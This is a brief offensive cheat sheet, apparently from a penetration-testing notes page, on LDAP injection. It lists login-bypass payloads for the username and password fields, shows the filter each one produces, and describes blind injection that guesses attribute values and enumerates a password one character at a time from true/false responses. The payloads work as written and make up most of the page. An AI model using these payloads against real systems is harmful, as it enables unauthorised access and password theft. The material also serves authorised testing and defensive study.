Basic LDAP Injection
# Classical request : (&(uid=)(userPassword=))
# So result is TRUE if uid AND userPassword are true
# You can put ‘)’ in request to crash and see the request
username : *)(|(uid=*
password : )
→ (&(uid=*)(|(uid=*)(userPassword=)))
OR
username=*
password=*)(&
→ (&(uid=*)(userPassword=*)(&))
Blind LDAP Injection
# You have to find/imagine how is the request built
# test using only a char → OK → request is (mail=*[texte]*)
# You can try (mail=*)(sn=*) → )(sn= → OK
# Then, the password attribute (mail=*)(password=*) → OK
@*)(password=x → FALSE
@*)(password=d → TRUE
# You can the enumerate each char
Last updated